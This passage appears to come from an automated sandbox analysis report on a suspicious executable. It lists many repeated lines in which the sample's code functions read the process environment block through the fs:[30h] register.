Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D6FE0 mov eax, dword ptr fs:[00000030h]	10_2_1E8D6FE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D6FE0 mov eax, dword ptr fs:[00000030h]	10_2_1E8D6FE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D6FE0 mov eax, dword ptr fs:[00000030h]	10_2_1E8D6FE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8E8FFB mov eax, dword ptr fs:[00000030h]	10_2_1E8E8FFB
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8FBF0C mov eax, dword ptr fs:[00000030h]	10_2_1E8FBF0C
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8FBF0C mov eax, dword ptr fs:[00000030h]	10_2_1E8FBF0C
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8FBF0C mov eax, dword ptr fs:[00000030h]	10_2_1E8FBF0C
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E994F1D mov eax, dword ptr fs:[00000030h]	10_2_1E994F1D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E900F16 mov eax, dword ptr fs:[00000030h]	10_2_1E900F16
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E900F16 mov eax, dword ptr fs:[00000030h]	10_2_1E900F16
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E900F16 mov eax, dword ptr fs:[00000030h]	10_2_1E900F16
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E900F16 mov eax, dword ptr fs:[00000030h]	10_2_1E900F16
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8DCF00 mov eax, dword ptr fs:[00000030h]	10_2_1E8DCF00
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8DCF00 mov eax, dword ptr fs:[00000030h]	10_2_1E8DCF00
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E93FF03 mov eax, dword ptr fs:[00000030h]	10_2_1E93FF03
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E93FF03 mov eax, dword ptr fs:[00000030h]	10_2_1E93FF03
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E93FF03 mov eax, dword ptr fs:[00000030h]	10_2_1E93FF03
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E948F3C mov eax, dword ptr fs:[00000030h]	10_2_1E948F3C
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E948F3C mov eax, dword ptr fs:[00000030h]	10_2_1E948F3C
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E948F3C mov ecx, dword ptr fs:[00000030h]	10_2_1E948F3C
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E948F3C mov ecx, dword ptr fs:[00000030h]	10_2_1E948F3C
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8DDF36 mov eax, dword ptr fs:[00000030h]	10_2_1E8DDF36
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8DDF36 mov eax, dword ptr fs:[00000030h]	10_2_1E8DDF36
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8DDF36 mov eax, dword ptr fs:[00000030h]	10_2_1E8DDF36
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8DDF36 mov eax, dword ptr fs:[00000030h]	10_2_1E8DDF36
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BFF30 mov edi, dword ptr fs:[00000030h]	10_2_1E8BFF30
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E97AF50 mov ecx, dword ptr fs:[00000030h]	10_2_1E97AF50
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E97BF4D mov eax, dword ptr fs:[00000030h]	10_2_1E97BF4D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E916F70 mov eax, dword ptr fs:[00000030h]	10_2_1E916F70
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E994F7C mov eax, dword ptr fs:[00000030h]	10_2_1E994F7C
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E97EF66 mov eax, dword ptr fs:[00000030h]	10_2_1E97EF66
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BEF79 mov eax, dword ptr fs:[00000030h]	10_2_1E8BEF79
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BEF79 mov eax, dword ptr fs:[00000030h]	10_2_1E8BEF79
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BEF79 mov eax, dword ptr fs:[00000030h]	10_2_1E8BEF79
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BBF70 mov eax, dword ptr fs:[00000030h]	10_2_1E8BBF70
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C1F70 mov eax, dword ptr fs:[00000030h]	10_2_1E8C1F70
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EAF72 mov eax, dword ptr fs:[00000030h]	10_2_1E8EAF72
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E97FC95 mov eax, dword ptr fs:[00000030h]	10_2_1E97FC95
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8B7C85 mov eax, dword ptr fs:[00000030h]	10_2_1E8B7C85
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8B7C85 mov eax, dword ptr fs:[00000030h]	10_2_1E8B7C85
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8B7C85 mov eax, dword ptr fs:[00000030h]	10_2_1E8B7C85
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8B7C85 mov eax, dword ptr fs:[00000030h]	10_2_1E8B7C85
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8B7C85 mov eax, dword ptr fs:[00000030h]	10_2_1E8B7C85
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E969C98 mov ecx, dword ptr fs:[00000030h]	10_2_1E969C98
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E969C98 mov eax, dword ptr fs:[00000030h]	10_2_1E969C98
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E969C98 mov eax, dword ptr fs:[00000030h]	10_2_1E969C98
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E969C98 mov eax, dword ptr fs:[00000030h]	10_2_1E969C98
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E943C80 mov ecx, dword ptr fs:[00000030h]	10_2_1E943C80
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C7C95 mov eax, dword ptr fs:[00000030h]	10_2_1E8C7C95
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C7C95 mov eax, dword ptr fs:[00000030h]	10_2_1E8C7C95
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8F9CCF mov eax, dword ptr fs:[00000030h]	10_2_1E8F9CCF
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E953CD4 mov eax, dword ptr fs:[00000030h]	10_2_1E953CD4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E953CD4 mov eax, dword ptr fs:[00000030h]	10_2_1E953CD4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E953CD4 mov ecx, dword ptr fs:[00000030h]	10_2_1E953CD4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E953CD4 mov eax, dword ptr fs:[00000030h]	10_2_1E953CD4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E953CD4 mov eax, dword ptr fs:[00000030h]	10_2_1E953CD4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E945CD0 mov eax, dword ptr fs:[00000030h]	10_2_1E945CD0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8CFCC9 mov eax, dword ptr fs:[00000030h]	10_2_1E8CFCC9
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8B6CC0 mov eax, dword ptr fs:[00000030h]	10_2_1E8B6CC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8B6CC0 mov eax, dword ptr fs:[00000030h]	10_2_1E8B6CC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8B6CC0 mov eax, dword ptr fs:[00000030h]	10_2_1E8B6CC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E994CD2 mov eax, dword ptr fs:[00000030h]	10_2_1E994CD2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8F6CC0 mov eax, dword ptr fs:[00000030h]	10_2_1E8F6CC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8E8CDF mov eax, dword ptr fs:[00000030h]	10_2_1E8E8CDF
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8E8CDF mov eax, dword ptr fs:[00000030h]	10_2_1E8E8CDF
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8DDCD1 mov eax, dword ptr fs:[00000030h]	10_2_1E8DDCD1
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8DDCD1 mov eax, dword ptr fs:[00000030h]	10_2_1E8DDCD1
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8DDCD1 mov eax, dword ptr fs:[00000030h]	10_2_1E8DDCD1
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8FCCD1 mov ecx, dword ptr fs:[00000030h]	10_2_1E8FCCD1
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8FCCD1 mov eax, dword ptr fs:[00000030h]	10_2_1E8FCCD1
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8FCCD1 mov eax, dword ptr fs:[00000030h]	10_2_1E8FCCD1
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E93CCF0 mov ecx, dword ptr fs:[00000030h]	10_2_1E93CCF0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8B7CF1 mov eax, dword ptr fs:[00000030h]	10_2_1E8B7CF1
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E940CEE mov eax, dword ptr fs:[00000030h]	10_2_1E940CEE
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C3CF0 mov eax, dword ptr fs:[00000030h]	10_2_1E8C3CF0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C3CF0 mov eax, dword ptr fs:[00000030h]	10_2_1E8C3CF0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EECF3 mov eax, dword ptr fs:[00000030h]	10_2_1E8EECF3
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EECF3 mov eax, dword ptr fs:[00000030h]	10_2_1E8EECF3
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E957CE8 mov eax, dword ptr fs:[00000030h]	10_2_1E957CE8
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8F2C10 mov eax, dword ptr fs:[00000030h]	10_2_1E8F2C10
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8F2C10 mov eax, dword ptr fs:[00000030h]	10_2_1E8F2C10
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8F2C10 mov eax, dword ptr fs:[00000030h]	10_2_1E8F2C10
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8F2C10 mov eax, dword ptr fs:[00000030h]	10_2_1E8F2C10
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E985C38 mov eax, dword ptr fs:[00000030h]	10_2_1E985C38
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E985C38 mov ecx, dword ptr fs:[00000030h]	10_2_1E985C38
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D3C20 mov eax, dword ptr fs:[00000030h]	10_2_1E8D3C20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8DAC20 mov eax, dword ptr fs:[00000030h]	10_2_1E8DAC20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8DAC20 mov eax, dword ptr fs:[00000030h]	10_2_1E8DAC20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8DAC20 mov eax, dword ptr fs:[00000030h]	10_2_1E8DAC20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E957C38 mov eax, dword ptr fs:[00000030h]	10_2_1E957C38
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8F4C3D mov eax, dword ptr fs:[00000030h]	10_2_1E8F4C3D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8B8C3D mov eax, dword ptr fs:[00000030h]	10_2_1E8B8C3D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E994C59 mov eax, dword ptr fs:[00000030h]	10_2_1E994C59
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E943C57 mov eax, dword ptr fs:[00000030h]	10_2_1E943C57
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BDC40 mov eax, dword ptr fs:[00000030h]	10_2_1E8BDC40
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D3C40 mov eax, dword ptr fs:[00000030h]	10_2_1E8D3C40
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8FBC6E mov eax, dword ptr fs:[00000030h]	10_2_1E8FBC6E
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8FBC6E mov eax, dword ptr fs:[00000030h]	10_2_1E8FBC6E
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BCC68 mov eax, dword ptr fs:[00000030h]	10_2_1E8BCC68
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D3C60 mov eax, dword ptr fs:[00000030h]	10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D3C60 mov eax, dword ptr fs:[00000030h]	10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D3C60 mov eax, dword ptr fs:[00000030h]	10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D3C60 mov eax, dword ptr fs:[00000030h]	10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D3C60 mov ecx, dword ptr fs:[00000030h]	10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D3C60 mov ecx, dword ptr fs:[00000030h]	10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D3C60 mov eax, dword ptr fs:[00000030h]	10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D3C60 mov ecx, dword ptr fs:[00000030h]	10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D3C60 mov ecx, dword ptr fs:[00000030h]	10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D3C60 mov eax, dword ptr fs:[00000030h]	10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D3C60 mov ecx, dword ptr fs:[00000030h]	10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D3C60 mov ecx, dword ptr fs:[00000030h]	10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D3C60 mov eax, dword ptr fs:[00000030h]	10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D3C60 mov eax, dword ptr fs:[00000030h]	10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D3C60 mov eax, dword ptr fs:[00000030h]	10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D3C60 mov eax, dword ptr fs:[00000030h]	10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D3C60 mov eax, dword ptr fs:[00000030h]	10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D3C60 mov eax, dword ptr fs:[00000030h]	10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D3C60 mov eax, dword ptr fs:[00000030h]	10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D3C60 mov eax, dword ptr fs:[00000030h]	10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C0C79 mov eax, dword ptr fs:[00000030h]	10_2_1E8C0C79
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C0C79 mov eax, dword ptr fs:[00000030h]	10_2_1E8C0C79
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C0C79 mov eax, dword ptr fs:[00000030h]	10_2_1E8C0C79
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C8C79 mov eax, dword ptr fs:[00000030h]	10_2_1E8C8C79
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C8C79 mov eax, dword ptr fs:[00000030h]	10_2_1E8C8C79
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C8C79 mov eax, dword ptr fs:[00000030h]	10_2_1E8C8C79
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C8C79 mov eax, dword ptr fs:[00000030h]	10_2_1E8C8C79
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C8C79 mov eax, dword ptr fs:[00000030h]	10_2_1E8C8C79
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BCD8A mov eax, dword ptr fs:[00000030h]	10_2_1E8BCD8A
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BCD8A mov eax, dword ptr fs:[00000030h]	10_2_1E8BCD8A
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C6D91 mov eax, dword ptr fs:[00000030h]	10_2_1E8C6D91
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8B6DA6 mov eax, dword ptr fs:[00000030h]	10_2_1E8B6DA6
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8F2DBC mov eax, dword ptr fs:[00000030h]	10_2_1E8F2DBC
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8F2DBC mov ecx, dword ptr fs:[00000030h]	10_2_1E8F2DBC
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C7DB6 mov eax, dword ptr fs:[00000030h]	10_2_1E8C7DB6
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BDDB0 mov eax, dword ptr fs:[00000030h]	10_2_1E8BDDB0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E994DA7 mov eax, dword ptr fs:[00000030h]	10_2_1E994DA7
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E97ADD6 mov eax, dword ptr fs:[00000030h]	10_2_1E97ADD6
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E97ADD6 mov eax, dword ptr fs:[00000030h]	10_2_1E97ADD6
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8B8DCD mov eax, dword ptr fs:[00000030h]	10_2_1E8B8DCD
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E96FDF4 mov eax, dword ptr fs:[00000030h]	10_2_1E96FDF4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E96FDF4 mov eax, dword ptr fs:[00000030h]	10_2_1E96FDF4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E96FDF4 mov eax, dword ptr fs:[00000030h]	10_2_1E96FDF4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E96FDF4 mov eax, dword ptr fs:[00000030h]	10_2_1E96FDF4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E96FDF4 mov eax, dword ptr fs:[00000030h]	10_2_1E96FDF4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E96FDF4 mov eax, dword ptr fs:[00000030h]	10_2_1E96FDF4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E96FDF4 mov eax, dword ptr fs:[00000030h]	10_2_1E96FDF4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E96FDF4 mov eax, dword ptr fs:[00000030h]	10_2_1E96FDF4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E96FDF4 mov eax, dword ptr fs:[00000030h]	10_2_1E96FDF4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E96FDF4 mov eax, dword ptr fs:[00000030h]	10_2_1E96FDF4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E96FDF4 mov eax, dword ptr fs:[00000030h]	10_2_1E96FDF4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E96FDF4 mov eax, dword ptr fs:[00000030h]	10_2_1E96FDF4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8CBDE0 mov eax, dword ptr fs:[00000030h]	10_2_1E8CBDE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8CBDE0 mov eax, dword ptr fs:[00000030h]	10_2_1E8CBDE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8CBDE0 mov eax, dword ptr fs:[00000030h]	10_2_1E8CBDE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8CBDE0 mov eax, dword ptr fs:[00000030h]	10_2_1E8CBDE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8CBDE0 mov eax, dword ptr fs:[00000030h]	10_2_1E8CBDE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8CBDE0 mov eax, dword ptr fs:[00000030h]	10_2_1E8CBDE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8CBDE0 mov eax, dword ptr fs:[00000030h]	10_2_1E8CBDE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8CBDE0 mov eax, dword ptr fs:[00000030h]	10_2_1E8CBDE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EFDE0 mov eax, dword ptr fs:[00000030h]	10_2_1E8EFDE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BEDFA mov eax, dword ptr fs:[00000030h]	10_2_1E8BEDFA
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E98CDEB mov eax, dword ptr fs:[00000030h]	10_2_1E98CDEB
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E98CDEB mov eax, dword ptr fs:[00000030h]	10_2_1E98CDEB
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8CAD00 mov eax, dword ptr fs:[00000030h]	10_2_1E8CAD00
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8CAD00 mov eax, dword ptr fs:[00000030h]	10_2_1E8CAD00
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8CAD00 mov eax, dword ptr fs:[00000030h]	10_2_1E8CAD00
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8CAD00 mov eax, dword ptr fs:[00000030h]	10_2_1E8CAD00
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8CAD00 mov eax, dword ptr fs:[00000030h]	10_2_1E8CAD00
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8CAD00 mov eax, dword ptr fs:[00000030h]	10_2_1E8CAD00
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8E0D01 mov eax, dword ptr fs:[00000030h]	10_2_1E8E0D01
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E94CD00 mov eax, dword ptr fs:[00000030h]	10_2_1E94CD00
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E94CD00 mov eax, dword ptr fs:[00000030h]	10_2_1E94CD00
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8ECD10 mov eax, dword ptr fs:[00000030h]	10_2_1E8ECD10
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8ECD10 mov ecx, dword ptr fs:[00000030h]	10_2_1E8ECD10
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E97BD08 mov eax, dword ptr fs:[00000030h]	10_2_1E97BD08
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E97BD08 mov eax, dword ptr fs:[00000030h]	10_2_1E97BD08
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E958D0A mov eax, dword ptr fs:[00000030h]	10_2_1E958D0A
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BFD20 mov eax, dword ptr fs:[00000030h]	10_2_1E8BFD20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EAD20 mov eax, dword ptr fs:[00000030h]	10_2_1E8EAD20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EAD20 mov eax, dword ptr fs:[00000030h]	10_2_1E8EAD20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EAD20 mov eax, dword ptr fs:[00000030h]	10_2_1E8EAD20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EAD20 mov ecx, dword ptr fs:[00000030h]	10_2_1E8EAD20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EAD20 mov eax, dword ptr fs:[00000030h]	10_2_1E8EAD20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EAD20 mov eax, dword ptr fs:[00000030h]	10_2_1E8EAD20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EAD20 mov eax, dword ptr fs:[00000030h]	10_2_1E8EAD20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EAD20 mov eax, dword ptr fs:[00000030h]	10_2_1E8EAD20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EAD20 mov eax, dword ptr fs:[00000030h]	10_2_1E8EAD20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EAD20 mov eax, dword ptr fs:[00000030h]	10_2_1E8EAD20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E970D24 mov eax, dword ptr fs:[00000030h]	10_2_1E970D24
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E970D24 mov eax, dword ptr fs:[00000030h]	10_2_1E970D24
